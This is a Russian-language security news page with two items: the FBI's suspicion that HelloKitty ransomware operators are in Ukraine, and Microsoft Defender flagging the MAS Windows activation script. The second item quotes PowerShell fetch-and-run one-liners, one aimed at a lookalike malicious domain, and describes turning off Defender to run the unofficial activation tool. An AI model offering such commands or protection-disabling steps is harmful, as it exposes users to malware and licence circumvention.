ФБР считает, что операторы HelloKitty атакуют с территории Украины

ФБР считает, что операторы HelloKitty атакуют с территории Украины

ФБР считает, что операторы HelloKitty атакуют с территории Украины

Как правило, правоохранительные органы не озвучивают промежуточные выводы относительно принадлежности какой-либо киберпреступной группировки к определённой стране. Тем не менее на днях стало известно, что ФБР подозревает украинское происхождение группы HelloKitty, которая немало почудила в этом году.

Почему такую информацию стараются держать в секрете? Всё просто: правоохранителям в первую очередь нужны задержания, поэтому лишня огласка только мешает, ведь преступники могут уничтожить улики и улететь в страну, которая не выдаст их полицейским.

Медицинское учреждение из Орегона недавно случайно раскрыло выводы ФБР в отношении кибергруппы HelloKitty (FiveHands). Спецслужба считает, что операторы шифровальщика действует с территории Украины.

«21 октября ФБР уведомило OAG о ликвидации аккаунтов, принадлежащих HelloKitty — украинской киберпреступной группировке. По словам сотрудников спецслужбы, злоумышленники использовали уязвимость в стороннем файрволе и получили доступ к сети, а также к данным пациента и служащего», — гласит заявление Oregon Anesthesiology Group.

Напомним, что именно HelloKitty стояла за атакой на разработчика популярной видеоигры Cyberpunk 2077. В феврале 2021 года атакующим удалось взломать CD Projekt Red и украсть исходный код игр. Уже летом этого года стало известно об операциях HelloKitty, затрагивающих уязвимые устройства SonicWall.

А правоохранители Украины тем временем продолжают задерживать подозреваемых в киберпреступлениях граждан. Например, на днях киберполиция арестовала злоумышленников, продававших персональные данные 300 миллионов пользователей.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru